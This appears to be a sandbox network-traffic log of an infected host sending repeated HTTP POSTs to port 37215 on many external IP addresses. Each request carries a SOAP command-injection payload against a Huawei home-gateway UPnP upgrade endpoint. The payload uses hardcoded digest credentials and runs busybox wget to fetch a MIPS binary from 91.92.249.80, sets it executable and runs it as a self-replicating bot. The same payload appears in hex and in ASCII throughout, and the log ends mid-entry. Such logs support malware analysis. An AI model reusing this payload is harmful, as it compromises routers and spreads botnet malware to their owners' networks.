                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2295192.168.2.2338410157.187.133.837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667393923 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2296192.168.2.2356896107.66.249.19337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667404890 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2297192.168.2.2354532157.4.197.13237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667428970 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2298192.168.2.2350980157.86.47.24437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667515039 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2299192.168.2.2344610157.248.129.6137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667644978 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2300192.168.2.233639841.138.114.18237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667651892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2301192.168.2.2348124157.59.252.12537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667680979 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2302192.168.2.234800241.161.218.22037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667685032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2303192.168.2.2344394157.200.20.23937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667685032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2304192.168.2.2334556197.187.25.6737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667789936 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
